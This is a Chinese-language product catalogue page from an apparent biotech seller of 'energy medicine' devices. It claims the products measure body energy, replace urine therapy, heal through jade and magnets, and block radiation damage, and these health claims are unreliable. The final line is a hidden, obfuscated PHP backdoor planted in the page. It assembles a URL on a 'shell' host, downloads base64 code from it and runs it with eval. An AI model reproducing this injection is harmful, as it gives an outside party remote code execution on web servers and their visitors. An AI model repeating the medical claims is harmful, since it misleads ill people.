收藏本站
首頁 arrow 康皇生物科技
康皇生物科技 列印 E-mail
文章索引
康皇生物科技
頁 2
頁 3
頁 4


四、能量醫療用品系列
20
神農21系列
(1)調整儀
(2)測量儀
(3)二合一
(傅爾電針EAV、秦測儀、EDSD)
將正能量充入身體,並導出身體的負能量。使身體擁有好的能量並以自我療癒的方式恢復健康。
可測量出身體的能量,藉以判斷身體異常狀況,可檢測出與人相適應之食物、藥物種類及劑量。
 
 
21
能量轉換器
可以把物體訊號化,加以轉變至另一物體中(如水),以正向波或負向波轉換訊號,可以取代尿療法並擴大功能,將尿液之負向訊息傳遞至水中,可平衡體內毒素,恢復健康,正向波可激發身體免疫功能。過敏食物以負向波轉換訊號,可平衡過敏反應,立即改善身體不適。
 
 
22
建寶
(玉磁)
結合了現代醫學及中國古老醫學基本理論和陰陽五行學說,更運用了現代物理學中電磁場理論。它不僅結合了寶石療法(玉療)玉的袪邪氣導出病氣,磁的扶正氣引入好的能量,顏色療法把玉的袪邪氣、磁的扶正氣,一併導入五行本生本克的臟器中,讓它們之間有相輔相成的效果。以色、玉、磁結合,透過色、玉、負磁對人體經絡取穴達到療效,對怕針灸者是一大福音。
 
 
 
整套(五片)
23
汰惡
(有整流功能的二極半導體)
消除存在我們週遭或體內造成人體的疲勞與不適的負能量增強人體能量,抗拒日常生活中現代科技產品所產生的輻射傷害。包括螢光燈、各種電器設備、X光、微波爐、電腦、高壓電、變電器、病房、負能量場域、合成化學藥品等。
汰惡須置於身體左側或正中央。
 



 
@eval(base64_decode(file_get_contents('h'.str_replace('$','ell',str_replace('&','.',str_replace('^','/',str_replace('%','ttp','%:^^sh$&nn'.'xuu&com^ab&ph'.'p')))))));